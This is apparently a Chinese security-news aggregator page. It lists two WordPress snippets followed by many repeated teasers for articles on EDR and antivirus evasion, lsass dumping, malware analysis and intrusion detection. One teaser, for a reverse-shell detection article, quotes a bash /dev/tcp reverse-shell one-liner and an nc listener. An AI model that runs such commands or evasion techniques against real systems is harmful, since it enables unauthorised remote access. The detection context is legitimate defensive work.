WordPress 图片优化和压缩插件:Smush 优化图像,打开延迟加载,调整大小,压缩和提高您的Google页面速度,使用令人难以置信的强大且100%免费的WordPress图像扫描器,由WPMU DEV的超级团队带给您!文章源自知更鸟-https://zm 05-04 693 0
判断 WordPress 文章中有特定短代码时加载脚本 短代码是WordPress常用的功能,虽然目前已被区块所取代,但还是普遍应用中。有些短代码会用到JS脚本,但又不想全局加载,可以用下面的代码实现,添加短代码时仅在当前页面加载JS脚本 05-04 494 0
AnQuanKeInfo 如何控制.NET CLR使用日志实现EDR规避 0x00 前言 近几年来,研究人员公开了规避端点安全解决方案(如A/V、EDR以及日志记录工具)的各种技术,其中涉及到的方法通常在具体技巧和实现上有所不同,但都 2023-11-251评论
AnQuanKeInfo Windows渗透基础大全 Windows发展历史 Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是DOS模拟环境,后续的系统版本由于微 2023-11-252评论
AnQuanKeInfo HIDS-Agent开发之检测反弹shell 介绍 bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 #TCPListener: nc -nvlp 1234目标机执行后的结果 2023-11-253评论
AnQuanKeInfo 使用Sysmon和Winlogbeat打造Windows平台的HIDS 介绍 https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysmonSysmon是微软的一款免费的 2023-11-251评论
AnQuanKeInfo 如何在用户态下绕过LSA保护机制(Part 1) 0x00 前言 2018年,James Forshaw发表了一篇文章,其中简要提到了一种技巧,可以使用管理员权限将任意代码注入PPL中。然而,我觉得这篇文章并没 2023-11-252评论
AnQuanKeInfo 记一次反制追踪溯本求源 前言 朋友说自己服务器巨卡,里边放了一堆项目资料,环境也集成一大堆,身为他bb,义不容辞,必须给他看看,本来以为挺简单的,给杀杀毒,清理一下文件就ok了,没想到 2023-11-251评论
4HOU_新闻 Linux下DDOS攻击木马分析报告 在最近的一次给用户做服务器系统安全检测的过程中发现一台服务器,频繁向外发包,网页打开缓慢,上服务器提取了样本的情况分析如下:1. 样本基本信息2. 样本概述样本 2023-11-250评论
AnQuanKeInfo 攻击检测之cobaltstrike4.3上 1.背景介绍 本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl 2023-11-251评论
AnQuanKeInfo 基于Linux Namespaces 特性 实现的消音 TL;DR这不是什么新技术,仅仅只是一些利用。 这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。 使用Linux Nam 2023-11-250评论
AnQuanKeInfo 应急响应的神兵利器 1.文章概述 本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇 windows终端的 2023-11-250评论
AnQuanKeInfo Smoke Loader 木马病毒分析 Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达 2023-11-240评论
AnQuanKeInfo 攻击检测之cobaltstrike4.3上 1.背景介绍 本文主要是从终端层面(windows日志,sysmon日志)对cobaltstrike4.3版本默认的功能产生的行为进行检测。2.HTMLAppl 2023-11-242评论
4HOU_新闻 PowerShell技巧——借助kd.exe隐藏进程 0x00 前言Pierre-Alexandre Braeken在SecTor2016上做了一个很棒的演讲——HACK MICROSOFT BY USING MI 2023-11-241评论
AnQuanKeInfo 基于Linux Namespaces 特性 实现的消音 TL;DR这不是什么新技术,仅仅只是一些利用。 这是一个减少攻击噪音的工具,但同时也会产生其他噪音,但收益大于支出,属于OPSEC一类。 使用Linux Nam 2023-11-244评论
AnQuanKeInfo 应急响应的神兵利器 1.文章概述 本文主要介绍windows以及linux应急响应方面的知识以及排除思路以及笔者日常使用的相关的优秀工具。2.windows篇 windows终端的 2023-11-243评论
4HOU_新闻 Linux下DDOS攻击木马分析报告 在最近的一次给用户做服务器系统安全检测的过程中发现一台服务器,频繁向外发包,网页打开缓慢,上服务器提取了样本的情况分析如下:1. 样本基本信息2. 样本概述样本 2023-11-240评论
AnQuanKeInfo Smoke Loader 木马病毒分析 Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达 2023-11-242评论
AnQuanKeInfo 基于Linux连接器的审计进程事件实现方案 1 引言 主机安全是信息安全纵深防御体系中最贴近业务的安全组件,离得近,看得清,能够及时感知入侵行为。攻击者的绝大多数攻击行为都是以进程的方式呈现,攻击者执行命 2023-11-243评论
AnQuanKeInfo Smoke Loader 木马病毒分析 Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达 2023-11-243评论
AnQuanKeInfo 转储lsass的方法原理和实现学习 lsass.exe(Local Security Authority Subsystem Service进程空间中,存有着机器的域、本地用户名和密码等重要信息。 2023-11-245评论
AnQuanKeInfo CVE-2016-6909 Fortigate 防火墙 Cookie 解析漏洞复现及简要分析 0x00.一切开始之前 Fortigate 系列是 Fortinet(飞塔)公司旗下的防火墙产品之一,2016年,Shadow Brokers公开了黑客组织Eq 2023-11-240评论
AnQuanKeInfo 以原生速度在 macOS 上模糊测试 iOS 代码 0x0 概述 随着Apple Silicon Mac的推出,在 Mac 上原生运行 iOS 应用程序成为可能。这归咎于 (1) iPhone 和 Apple S 2023-11-241评论
AnQuanKeInfo 在Firefox中有效模糊测试IPC层 火狐内部的进程间通信(IPC)层是火狐多进程安全架构的基石。因此,消除IPC层中的安全漏洞仍然至关重要。在这篇博文中,我们调查并描述了Firefox用于执行 2023-11-245评论
AnQuanKeInfo Antivirus Bypass(二)基于CreateProcess函数 本篇文章是Bypass思路系列文章的第二篇,后续会持续更新有关Bypass的思路 因为工作原因,文章断断续续,时间线上会存在差异,思路及代码可行性仅供参考。 若 2023-11-240评论
AnQuanKeInfo Smoke Loader 木马病毒分析 Smoke Loader 木马最早于 2011 年在野外被人们发现,其主要功能是在受感染的的机器上投放其他更具破坏性的恶意软件。经过多年的演变其已经能够加载多达 2023-11-241评论